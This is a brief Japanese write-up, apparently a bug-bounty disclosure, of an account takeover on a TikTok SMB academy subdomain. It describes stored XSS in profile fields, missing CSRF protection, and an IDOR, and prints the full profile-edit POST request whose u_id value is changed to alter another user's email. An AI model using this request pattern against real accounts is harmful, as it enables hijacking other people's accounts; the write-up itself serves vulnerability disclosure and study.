Hello there, ('ω')ノ
TikTok SMB サブドメインのアカウント乗っ取りにつながる複数の脆弱性を。
脆弱性:
IDOR
記事:
今回は、TikTok でアカウントを乗っ取る方法を。
まず、これらの広告からこの URL を取得し、メールに送信されて。
下記が、2番目のURL:tiktoksmbacademyeu.comで。
プロファイル名と会社名では、xss に対して脆弱であり、
csrf に対して保護されておらず。
csrf からユーザを悪用できますが、ここで別のバグを見つけて。
IDORはIDを1000から任意のIDに変更でき、メールアドレスと名前を変更でき
プロファイル設定を保存した後、Burp からのこの HTTP リクエストを見つけて。
POST /wp-content/themes/tiktok/includes/user/user.php HTTP/1.1
Host: tiktoksmbacademyeu.com
— — — — — — — — — — — — — — -284212657035056129353908728991
Content-Disposition: form-data; name=”action”
profile_edit
— — — — — — — — — — — — — — -284212657035056129353908728991
Content-Disposition: form-data; name=”name”
LukyJHKHJddd
— — — — — — — — — — — — — — -284212657035056129353908728991
Content-Disposition: form-data; name=”email”
hacked@protonmail.ch
— — — — — — — — — — — — — — -284212657035056129353908728991
Content-Disposition: form-data; name=”country”
Anguilla
— — — — — — — — — — — — — — -284212657035056129353908728991
Content-Disposition: form-data; name=”company_name”
hacked
— — — — — — — — — — — — — — -284212657035056129353908728991
Content-Disposition: form-data; name=”u_id”
1504
— — — — — — — — — — — — — — -284212657035056129353908728991
Content-Disposition: form-data; name=”upload_an_image”
— — — — — — — — — — — — — — -284212657035056129353908728991 —
他のアカウントを作成すると、この u_id が 1504 から 1505 に変更され。
Burp SuiiteでリクエストをのIDを1504から1505に変更すると
2 つのアカウントに 1 つのメールアドレスがあるようで、IDOR 機能して。
Best regards, (^^ゞ
